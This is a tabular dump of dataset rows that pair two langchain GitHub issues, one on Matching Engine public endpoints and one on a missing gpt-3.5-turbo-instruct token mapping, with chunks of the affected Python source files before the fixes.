status (stringclasses 1) | repo_name (stringclasses 31) | repo_url (stringclasses 31) | issue_id (int64, 1 to 104k) | title (stringlengths 4 to 233) | body (stringlengths 0 to 186k, nullable ⌀) | issue_url (stringlengths 38 to 56) | pull_url (stringlengths 37 to 54) | before_fix_sha (stringlengths 40) | after_fix_sha (stringlengths 40) | report_datetime (unknown) | language (stringclasses 5) | commit_datetime (unknown) | updated_file (stringlengths 7 to 188) | chunk_content (stringlengths 1 to 1.03M)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | ### System Info
langchain==0.0.244
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Create a new Matching Engine Index Endpoint that is public.
Follow the tutorial to run a similarity search:
```python
vector_store = MatchingEngine.from_components(
    project_id="",
    region="us-central1",
    gcs_bucket_name="",
    index_id="",
    endpoint_id="",
    embedding=embeddings,
)
vector_store.similarity_search("what is a cat?", k=5)
```
Error:
```
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression)
1021 def __call__(self,
1022 request: Any,
1023 timeout: Optional[float] = None,
(...)
1026 wait_for_ready: Optional[bool] = None,
1027 compression: Optional[grpc.Compression] = None) -> Any:
1028 state, call, = self._blocking(request, timeout, metadata, credentials,
1029 wait_for_ready, compression)
-> 1030 return _end_unary_response_blocking(state, call, False, None)
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline)
908 return state.response
909 else:
--> 910 raise _InactiveRpcError(state)
_InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNAVAILABLE
details = "DNS resolution failed for :10000: unparseable host:port"
debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}"
>
```
### Expected behavior
It should be possible to query a public index endpoint. The Vertex AI Python SDK supports it with the `endpoint.find_neighbors` function.
I think just switching [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` when the endpoint is public should do it.
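Below is a minimal sketch of what that change could look like. It is hypothetical and not the merged PR #10056 diff: `deployed_index_id`, `k`, and the query vector `embedding` are assumed to be in scope, and detecting a public endpoint via `public_endpoint_domain_name` is an assumption about the Vertex AI SDK surface.
```python
# Hypothetical sketch, not the actual fix from PR #10056.
if endpoint.public_endpoint_domain_name:
    # Public endpoints are queried over HTTPS via find_neighbors.
    response = endpoint.find_neighbors(
        deployed_index_id=deployed_index_id,
        queries=[embedding],
        num_neighbors=k,
    )
else:
    # Private (VPC-peered) endpoints keep using the gRPC match() call.
    response = endpoint.match(
        deployed_index_id=deployed_index_id,
        queries=[embedding],
        num_neighbors=k,
    )
```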
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls: Type["MatchingEngine"],
project_id: str,
region: str,
gcs_bucket_name: str,
index_id: str,
endpoint_id: str,
credentials_path: Optional[str] = None,
embedding: Optional[Embeddings] = None,
) -> "MatchingEngine":
"""Takes the object creation out of the constructor.
Args:
project_id: The GCP project id.
region: The default location making the API calls. It must have
the same location as the GCS bucket and must be regional.
gcs_bucket_name: The location where the vectors will be stored in
order for the index to be created.
index_id: The id of the created index.
endpoint_id: The id of the created endpoint.
credentials_path: (Optional) The path of the Google credentials on
the local file system.
embedding: The :class:`Embeddings` that will be used for
embedding the texts.
Returns:
A configured MatchingEngine with the texts added to the index.
"""
gcs_bucket_name = cls._validate_gcs_bucket(gcs_bucket_name)
credentials = cls._create_credentials_from_file(credentials_path)
index = cls._create_index_by_id(index_id, project_id, region, credentials)
endpoint = cls._create_endpoint_by_id(
endpoint_id, project_id, region, credentials |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | (issue body identical to the first #8378 row above)
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | )
gcs_client = cls._get_gcs_client(credentials, project_id)
cls._init_aiplatform(project_id, region, gcs_bucket_name, credentials)
return cls(
project_id=project_id,
index=index,
endpoint=endpoint,
embedding=embedding or cls._get_default_embeddings(),
gcs_client=gcs_client,
credentials=credentials,
gcs_bucket_name=gcs_bucket_name,
)
@classmethod
def _validate_gcs_bucket(cls, gcs_bucket_name: str) -> str:
"""Validates the gcs_bucket_name as a bucket name.
Args:
gcs_bucket_name: The received bucket uri.
Returns:
A valid gcs_bucket_name or throws ValueError if full path is
provided.
"""
gcs_bucket_name = gcs_bucket_name.replace("gs://", "")
if "/" in gcs_bucket_name:
raise ValueError(
f"The argument gcs_bucket_name should only be "
f"the bucket name. Received {gcs_bucket_name}"
)
return gcs_bucket_name
@classmethod
def _create_credentials_from_file( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | (issue body identical to the first #8378 row above)
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls, json_credentials_path: Optional[str]
) -> Optional[Credentials]:
"""Creates credentials for GCP.
Args:
json_credentials_path: The path on the file system where the
credentials are stored.
Returns:
An optional Credentials object, or None, in which case the
default will be used.
"""
from google.oauth2 import service_account
credentials = None
if json_credentials_path is not None:
credentials = service_account.Credentials.from_service_account_file(
json_credentials_path
)
return credentials
@classmethod
def _create_index_by_id( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | (issue body identical to the first #8378 row above)
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls, index_id: str, project_id: str, region: str, credentials: "Credentials"
) -> MatchingEngineIndex:
"""Creates a MatchingEngineIndex object by id.
Args:
index_id: The created index id.
project_id: The project to retrieve index from.
region: Location to retrieve index from.
credentials: GCS credentials.
Returns:
A configured MatchingEngineIndex.
"""
from google.cloud import aiplatform
logger.debug(f"Creating matching engine index with id {index_id}.")
return aiplatform.MatchingEngineIndex(
index_name=index_id,
project=project_id,
location=region,
credentials=credentials,
)
@classmethod
def _create_endpoint_by_id( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | (issue body identical to the first #8378 row above)
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls, endpoint_id: str, project_id: str, region: str, credentials: "Credentials"
) -> MatchingEngineIndexEndpoint:
"""Creates a MatchingEngineIndexEndpoint object by id.
Args:
endpoint_id: The created endpoint id.
project_id: The project to retrieve index from.
region: Location to retrieve index from.
credentials: GCS credentials.
Returns:
A configured MatchingEngineIndexEndpoint.
"""
from google.cloud import aiplatform
logger.debug(f"Creating endpoint with id {endpoint_id}.")
return aiplatform.MatchingEngineIndexEndpoint(
index_endpoint_name=endpoint_id,
project=project_id,
location=region,
credentials=credentials,
)
@classmethod
def _get_gcs_client( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | (issue body identical to the first #8378 row above)
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls, credentials: "Credentials", project_id: str
) -> "storage.Client":
"""Lazily creates a GCS client.
Returns:
A configured GCS client.
"""
from google.cloud import storage
return storage.Client(credentials=credentials, project=project_id)
@classmethod
def _init_aiplatform( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | (issue body identical to the first #8378 row above)
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | cls,
project_id: str,
region: str,
gcs_bucket_name: str,
credentials: "Credentials",
) -> None:
"""Configures the aiplatform library.
Args:
project_id: The GCP project id.
region: The default location making the API calls. It must have
the same location as the GCS bucket and must be regional.
gcs_bucket_name: GCS staging location.
credentials: The GCS Credentials object.
"""
from google.cloud import aiplatform
logger.debug(
f"Initializing AI Platform for project {project_id} on "
f"{region} and for {gcs_bucket_name}."
)
aiplatform.init(
project=project_id,
location=region,
staging_bucket=gcs_bucket_name,
credentials=credentials,
)
@classmethod
def _get_default_embeddings(cls) -> TensorflowHubEmbeddings: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | (issue body identical to the first #8378 row above)
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | """This function returns the default embedding.
Returns:
Default TensorflowHubEmbeddings to use.
"""
return TensorflowHubEmbeddings() |
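For reference, a quick illustration of how the `_validate_gcs_bucket` helper shown above behaves. This is a sketch that assumes the class is importable from `langchain.vectorstores.matching_engine`; it only exercises code already visible in the chunk:
```python
from langchain.vectorstores.matching_engine import MatchingEngine

# A "gs://" prefix is stripped down to the bare bucket name.
assert MatchingEngine._validate_gcs_bucket("gs://my-bucket") == "my-bucket"

# Full object paths are rejected: only a bucket name is accepted.
try:
    MatchingEngine._validate_gcs_bucket("gs://my-bucket/some/prefix")
except ValueError as err:
    print(err)  # "The argument gcs_bucket_name should only be the bucket name. ..."
```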
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
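A sketch of the likely one-line fix is below. It is hedged: the surrounding entries are abbreviated, and the 4096-token context size for `gpt-3.5-turbo-instruct` is an assumption, not confirmed from the merged PR.
```python
# Hypothetical sketch: add the missing entry to model_token_mapping
# in langchain/llms/openai.py.
model_token_mapping = {
    "gpt-4": 8192,
    "gpt-3.5-turbo": 4096,
    # ... existing entries elided ...
    "gpt-3.5-turbo-instruct": 4096,  # assumed context window
}
```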
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | from __future__ import annotations
import logging
import sys
import warnings
from typing import (
AbstractSet,
Any,
AsyncIterator,
Callable,
Collection,
Dict,
Iterator,
List,
Literal,
Mapping,
Optional,
Set,
Tuple,
Union,
)
from langchain.callbacks.manager import (
AsyncCallbackManagerForLLMRun,
CallbackManagerForLLMRun,
)
from langchain.llms.base import BaseLLM, create_base_retry_decorator
from langchain.pydantic_v1 import Field, root_validator
from langchain.schema import Generation, LLMResult
from langchain.schema.output import GenerationChunk
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
from langchain.utils.utils import build_extra_kwargs |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | (issue body identical to the first #10806 row above) | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | logger = logging.getLogger(__name__)
def update_token_usage(
keys: Set[str], response: Dict[str, Any], token_usage: Dict[str, Any]
) -> None:
"""Update token usage."""
_keys_to_use = keys.intersection(response["usage"])
for _key in _keys_to_use:
if _key not in token_usage:
token_usage[_key] = response["usage"][_key]
else:
token_usage[_key] += response["usage"][_key]
def _stream_response_to_generation_chunk(
stream_response: Dict[str, Any],
) -> GenerationChunk:
"""Convert a stream response to a generation chunk."""
return GenerationChunk(
text=stream_response["choices"][0]["text"],
generation_info=dict(
finish_reason=stream_response["choices"][0].get("finish_reason", None),
logprobs=stream_response["choices"][0].get("logprobs", None),
),
)
def _update_response(response: Dict[str, Any], stream_response: Dict[str, Any]) -> None:
"""Update response from the stream response."""
response["choices"][0]["text"] += stream_response["choices"][0]["text"]
response["choices"][0]["finish_reason"] = stream_response["choices"][0].get(
"finish_reason", None
)
response["choices"][0]["logprobs"] = stream_response["choices"][0]["logprobs"]
def _streaming_response_template() -> Dict[str, Any]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | (issue body identical to the first #10806 row above) | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | return {
"choices": [
{
"text": "",
"finish_reason": None,
"logprobs": None,
}
]
}
def _create_retry_decorator(
llm: Union[BaseOpenAI, OpenAIChat],
run_manager: Optional[
Union[AsyncCallbackManagerForLLMRun, CallbackManagerForLLMRun]
] = None,
) -> Callable[[Any], Any]:
import openai
errors = [
openai.error.Timeout,
openai.error.APIError,
openai.error.APIConnectionError,
openai.error.RateLimitError,
openai.error.ServiceUnavailableError,
]
return create_base_retry_decorator(
error_types=errors, max_retries=llm.max_retries, run_manager=run_manager
)
def completion_with_retry( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | (issue body identical to the first #10806 row above) | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | llm: Union[BaseOpenAI, OpenAIChat],
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Any:
"""Use tenacity to retry the completion call."""
retry_decorator = _create_retry_decorator(llm, run_manager=run_manager)
@retry_decorator
def _completion_with_retry(**kwargs: Any) -> Any:
return llm.client.create(**kwargs)
return _completion_with_retry(**kwargs)
async def acompletion_with_retry(
llm: Union[BaseOpenAI, OpenAIChat],
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Any:
"""Use tenacity to retry the async completion call."""
retry_decorator = _create_retry_decorator(llm, run_manager=run_manager)
@retry_decorator
async def _completion_with_retry(**kwargs: Any) -> Any:
return await llm.client.acreate(**kwargs)
return await _completion_with_retry(**kwargs)
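The two helpers above wrap the raw client calls in a tenacity retry decorator so transient failures (timeouts, rate limits, service unavailability) are retried up to `max_retries` times. A minimal usage sketch, assuming an initialized `OpenAI` LLM; this mirrors how `_generate` invokes the helper internally, but it is illustrative rather than taken from the library:
```python
from langchain.llms import OpenAI
from langchain.llms.openai import completion_with_retry

llm = OpenAI(model_name="text-davinci-003", max_retries=6)

# Retries transient OpenAI errors before surfacing them to the caller.
response = completion_with_retry(llm, prompt="Say hello", **llm._invocation_params)
print(response["choices"][0]["text"])
```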
class BaseOpenAI(BaseLLM): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | (issue body identical to the first #10806 row above) | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Base OpenAI large language model class."""
@property
def lc_secrets(self) -> Dict[str, str]:
return {"openai_api_key": "OPENAI_API_KEY"}
@property
def lc_serializable(self) -> bool:
return True
client: Any = None
model_name: str = Field(default="text-davinci-003", alias="model")
"""Model name to use."""
temperature: float = 0.7
"""What sampling temperature to use."""
max_tokens: int = 256
"""The maximum number of tokens to generate in the completion.
-1 returns as many tokens as possible given the prompt and
the model's maximal context size."""
top_p: float = 1
"""Total probability mass of tokens to consider at each step."""
frequency_penalty: float = 0
"""Penalizes repeated tokens according to frequency."""
presence_penalty: float = 0
"""Penalizes repeated tokens."""
n: int = 1
"""How many completions to generate for each prompt."""
best_of: int = 1
"""Generates best_of completions server-side and returns the "best"."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified.""" |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | (issue body identical to the first #10806 row above) | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | openai_api_key: Optional[str] = None
openai_api_base: Optional[str] = None
openai_organization: Optional[str] = None
openai_proxy: Optional[str] = None
batch_size: int = 20
"""Batch size to use when passing multiple documents to generate."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout for requests to OpenAI completion API. Default is 600 seconds."""
logit_bias: Optional[Dict[str, float]] = Field(default_factory=dict)
"""Adjust the probability of specific tokens being generated."""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
streaming: bool = False
"""Whether to stream the results or not."""
allowed_special: Union[Literal["all"], AbstractSet[str]] = set()
"""Set of special tokens that are allowed。"""
disallowed_special: Union[Literal["all"], Collection[str]] = "all"
"""Set of special tokens that are not allowed。"""
tiktoken_model_name: Optional[str] = None
"""The model name to pass to tiktoken when using this class.
Tiktoken is used to count the number of tokens in documents to constrain
them to be under a certain limit. By default, when set to None, this will
be the same as the embedding model name. However, there are some cases
where you may want to use this Embedding class with a model name not
supported by tiktoken. This can include when using Azure embeddings or
when using one of the many model providers that expose an OpenAI-like
API but with different models. In those cases, in order to avoid erroring
when tiktoken is called, you can specify a model name to use here."""
def __new__(cls, **data: Any) -> Union[OpenAIChat, BaseOpenAI]:  # type: ignore
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | (issue body identical to the first #10806 row above) | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Initialize the OpenAI object."""
model_name = data.get("model_name", "")
if (
model_name.startswith("gpt-3.5-turbo") or model_name.startswith("gpt-4")
) and "-instruct" not in model_name:
warnings.warn(
"You are trying to use a chat model. This way of initializing it is "
"no longer supported. Instead, please use: "
"`from langchain.chat_models import ChatOpenAI`"
)
return OpenAIChat(**data)
return super().__new__(cls)
class Config:
"""Configuration for this pydantic object."""
allow_population_by_field_name = True
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
values["model_kwargs"] = build_extra_kwargs(
extra, values, all_required_field_names
)
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | (issue body identical to the first #10806 row above) | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="",
)
try:
import openai |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | (issue body identical to the first #10806 row above) | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | values["client"] = openai.Completion
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
if values["streaming"] and values["n"] > 1:
raise ValueError("Cannot stream results when n > 1.")
if values["streaming"] and values["best_of"] > 1:
raise ValueError("Cannot stream results when best_of > 1.")
return values
@property
def _default_params(self) -> Dict[str, Any]:
"""Get the default parameters for calling OpenAI API."""
normal_params = {
"temperature": self.temperature,
"max_tokens": self.max_tokens,
"top_p": self.top_p,
"frequency_penalty": self.frequency_penalty,
"presence_penalty": self.presence_penalty,
"n": self.n,
"request_timeout": self.request_timeout,
"logit_bias": self.logit_bias,
}
# Azure gpt-35-turbo doesn't support best_of
# don't specify best_of if it is 1
if self.best_of > 1:
normal_params["best_of"] = self.best_of
return {**normal_params, **self.model_kwargs}
def _stream( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | (issue body identical to the first #10806 row above) | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Iterator[GenerationChunk]:
params = {**self._invocation_params, **kwargs, "stream": True}
        self.get_sub_prompts(params, [prompt], stop)  # this mutates params
for stream_resp in completion_with_retry(
self, prompt=prompt, run_manager=run_manager, **params
):
chunk = _stream_response_to_generation_chunk(stream_resp)
yield chunk
if run_manager:
run_manager.on_llm_new_token(
chunk.text,
chunk=chunk,
verbose=self.verbose,
logprobs=chunk.generation_info["logprobs"]
if chunk.generation_info
else None,
)
    async def _astream(
        self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> AsyncIterator[GenerationChunk]:
params = {**self._invocation_params, **kwargs, "stream": True}
        self.get_sub_prompts(params, [prompt], stop)  # this mutates params
async for stream_resp in await acompletion_with_retry(
self, prompt=prompt, run_manager=run_manager, **params
):
chunk = _stream_response_to_generation_chunk(stream_resp)
yield chunk
if run_manager:
await run_manager.on_llm_new_token(
chunk.text,
chunk=chunk,
verbose=self.verbose,
logprobs=chunk.generation_info["logprobs"]
if chunk.generation_info
else None,
)
    def _generate(
        self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
"""Call out to OpenAI's endpoint with k unique prompts.
Args:
prompts: The prompts to pass into the model.
stop: Optional list of stop words to use when generating.
Returns:
The full LLM output.
Example:
.. code-block:: python
response = openai.generate(["Tell me a joke."])
"""
        # TODO: write a unit test for this
params = self._invocation_params
params = {**params, **kwargs}
sub_prompts = self.get_sub_prompts(params, prompts, stop)
choices = []
token_usage: Dict[str, int] = {}
        # Get the token usage from the response.
        # Includes prompt, completion, and total tokens used.
        _keys = {"completion_tokens", "prompt_tokens", "total_tokens"}
        for _prompts in sub_prompts:
if self.streaming:
if len(_prompts) > 1:
raise ValueError("Cannot stream results with multiple prompts.")
generation: Optional[GenerationChunk] = None
for chunk in self._stream(_prompts[0], stop, run_manager, **kwargs):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
choices.append(
{
"text": generation.text,
"finish_reason": generation.generation_info.get("finish_reason")
if generation.generation_info
else None,
"logprobs": generation.generation_info.get("logprobs")
if generation.generation_info
else None,
}
)
else:
response = completion_with_retry(
self, prompt=_prompts, run_manager=run_manager, **params
)
choices.extend(response["choices"])
update_token_usage(_keys, response, token_usage)
return self.create_llm_result(choices, prompts, token_usage)
    async def _agenerate(
        self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
"""Call out to OpenAI's endpoint async with k unique prompts."""
params = self._invocation_params
params = {**params, **kwargs}
sub_prompts = self.get_sub_prompts(params, prompts, stop)
choices = []
token_usage: Dict[str, int] = {}
        # Get the token usage from the response.
        # Includes prompt, completion, and total tokens used.
_keys = {"completion_tokens", "prompt_tokens", "total_tokens"}
for _prompts in sub_prompts:
            if self.streaming:
                if len(_prompts) > 1:
raise ValueError("Cannot stream results with multiple prompts.")
generation: Optional[GenerationChunk] = None
